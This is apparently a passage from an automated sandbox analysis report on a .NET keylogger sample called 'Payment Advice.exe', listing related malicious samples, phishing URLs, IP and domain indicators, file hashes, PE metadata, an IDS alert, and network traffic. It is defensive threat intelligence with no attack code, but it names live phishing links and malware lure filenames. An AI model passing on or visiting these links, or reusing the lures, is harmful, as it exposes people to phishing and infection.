                                                                      r59e5aba5-e690-44bf-a397-997e3c24c602.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      SecuriteInfo.com.Win32.PWSX-gen.10368.23675.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      REQUEST FOR QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      BOOOKING -872872928229JK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      SecuriteInfo.com.Win32.SuspectCrc.5906.14432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      rt94UFPUzw1WEsSM.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • checkip.dyndns.org/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      checkip.dyndns.comPayment details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 193.122.130.0
                                                                      20250301_173245__P20250301_173245__P.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.122.6.168
                                                                      MARCH SHIPMENT PLAN DOCS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.122.130.0
                                                                      DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      Purchase-New Order PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 158.101.44.242
                                                                      SNKO05B250200012 SNKO05B250200023.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 193.122.6.168
                                                                      Payment Advice.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 193.122.6.168
                                                                      rarrivalnotice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      50% deposit's payment advice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      FACTURAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 158.101.44.242
                                                                      reallyfreegeoip.orgPayment details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.64.1
                                                                      20250301_173245__P20250301_173245__P.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.112.1
                                                                      MARCH SHIPMENT PLAN DOCS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.32.1
                                                                      DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 104.21.80.1
                                                                      Purchase-New Order PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.112.1
                                                                      SNKO05B250200012 SNKO05B250200023.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.112.1
                                                                      Payment Advice.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 104.21.112.1
                                                                      rarrivalnotice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.96.1
                                                                      50% deposit's payment advice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.96.1
                                                                      FACTURAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.112.1

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUScbr.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.4.15.178
                                                                      output.cmdGet hashmaliciousAgentTesla, Batch Injector, Discord Token StealerBrowse
                                                                      • 172.67.74.152
                                                                      https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                      • 104.17.25.14
                                                                      https://x3g.tcyoopxg.ru/eNDiSHVinaTEN/Get hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                      • 104.16.2.189
                                                                      https://stats.sender.net/link_click/eXzzr5-gpoZqzG-1uv25A/28201475b69bbc587107f3682383db16Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.27.94
                                                                      https://www.sendfilessecurely.com/getfile.aspx?id=pARB9my33Z7n44YKB9idRena3352du3vrZOKGet hashmaliciousUnknownBrowse
                                                                      • 104.21.92.56
                                                                      https://activatemicrostfacctCGMcpsDaBY.mxylqif.ru/xZj1Kc/#aW5mb0B1cmxhdWItbHVuei5hdA==Get hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                      • 104.17.25.14
                                                                      TagManager.exeGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      Message.emlGet hashmaliciousUnknownBrowse
                                                                      • 104.18.65.57
                                                                      TagManager.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.18.3.52
                                                                      UTMEMUSDHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      rarrivalnotice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      50% deposit's payment advice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      zooHQzUhh0xIDWC.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 132.226.8.169
                                                                      rPurchaseOrder-25-1201.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      Purchase Order # 8MJA15.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      akXjj2a58b.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      r59e5aba5-e690-44bf-a397-997e3c24c602.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      BUSDGH202412201.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 132.226.8.169

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      54328bd36c14bd82ddaa0c04b25ed9adPayment details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.80.1
                                                                      20250301_173245__P20250301_173245__P.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.80.1
                                                                      Irdff95nUE.exeGet hashmaliciousMoDiRATBrowse
                                                                      • 104.21.80.1
                                                                      Irdff95nUE.exeGet hashmaliciousMoDiRATBrowse
                                                                      • 104.21.80.1
                                                                      MARCH SHIPMENT PLAN DOCS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.80.1
                                                                      DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 104.21.80.1
                                                                      Purchase-New Order PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.80.1
                                                                      SNKO05B250200012 SNKO05B250200023.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 104.21.80.1
                                                                      Payment Advice.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                      • 104.21.80.1
                                                                      rarrivalnotice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.80.1

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1172
                                                                      Entropy (8bit):5.354777075714867
                                                                      Encrypted:false
                                                                      SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                                                      MD5:F614CCA1D985910D63FFFF70966F53F5
                                                                      SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                                                      SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                                                      SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ojpepf2.tek.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq0uy5ld.c52.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wj5ucvta.h41.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjtn34di.qcx.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.595447541256849
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Payment Advice.exe
                                                                      File size:594'432 bytes
                                                                      MD5:78ec5a1e11ee68c95a5e339fd492c90e
                                                                      SHA1:8423eca2ecf74c50f6f688d0555adf9b0a5ace2b
                                                                      SHA256:eb43ef748d41451eb6cbbf8ca967116280e754d24122b2961472f90c8c00aa9a
                                                                      SHA512:9b0fb8dc857f108d7a0c86d6b63bbf6ce99ee4cbde73bb0c31c6b0f1a09f970893f3daa841a26d491b55be300c62baa3232b5a5a5e3ae2c7935f815fea7bb769
                                                                      SSDEEP:12288:ejz9Mpm+gvyDcOE4R2629epTtir94JDGFlxPT:4z9LwoyKkpTc5MDGF
                                                                      TLSH:7BC4E0642269EB17D97A5BF80931E17453F92DED7811C21A8FEE6CEFB862F044D10263
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.-...............0.............J'... ...@....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x49274a
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xD22D0139 [Sat Sep 27 02:13:13 2081 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x926f80x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x594.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x901ac0x70.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x907500x908009af9b9438525b451e9bd0face3a4b7efFalse0.8557289413927336data7.6054071879897105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x940000x5940x6005e8f4a7d671839c1200501dab763f371False0.4114583333333333data4.034211927375768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x960000xc0x20029246f52fc0c2a7a7ecad4dedeb2aed2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x940900x304data0.42875647668393785
                                                                      RT_MANIFEST0x943a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      Comments
                                                                      CompanyName
                                                                      FileDescriptionProject
                                                                      FileVersion1.0.0.0
                                                                      InternalNameiAbl.exe
                                                                      LegalCopyrightCopyright 2023
                                                                      LegalTrademarks
                                                                      OriginalFilenameiAbl.exe
                                                                      ProductNameProject
                                                                      ProductVersion1.0.0.0
                                                                      Assembly Version1.0.0.0

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-03-05T13:08:21.158505+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733132.226.247.7380TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 5, 2025 13:08:20.185101986 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:08:20.190089941 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:08:20.190160990 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:08:20.190440893 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:08:20.195385933 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:08:20.889595032 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:08:20.892961979 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:08:20.899674892 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:08:21.109308958 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:08:21.158504963 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:08:21.931694031 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:21.931736946 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:21.931801081 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:21.939937115 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:21.939970016 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.422580004 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.422652960 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:22.427970886 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:22.428006887 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.428672075 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.471060991 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:22.473603964 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:22.516323090 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.606746912 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.606807947 CET44349735104.21.80.1192.168.2.4
                                                                      Mar 5, 2025 13:08:22.606889009 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:08:22.612032890 CET49735443192.168.2.4104.21.80.1
                                                                      Mar 5, 2025 13:09:26.109618902 CET8049733132.226.247.73192.168.2.4
                                                                      Mar 5, 2025 13:09:26.109908104 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:10:01.112371922 CET4973380192.168.2.4132.226.247.73
                                                                      Mar 5, 2025 13:10:01.119728088 CET8049733132.226.247.73192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 5, 2025 13:08:20.168857098 CET5149253192.168.2.41.1.1.1
                                                                      Mar 5, 2025 13:08:20.175993919 CET53514921.1.1.1192.168.2.4
                                                                      Mar 5, 2025 13:08:21.110563993 CET5781853192.168.2.41.1.1.1
                                                                      Mar 5, 2025 13:08:21.931046963 CET53578181.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 5, 2025 13:08:20.168857098 CET192.168.2.41.1.1.10xc714Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:21.110563993 CET192.168.2.41.1.1.10xb9aeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                      Mar 5, 2025 13:08:20.175993919 CET1.1.1.1192.168.2.40xc714No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
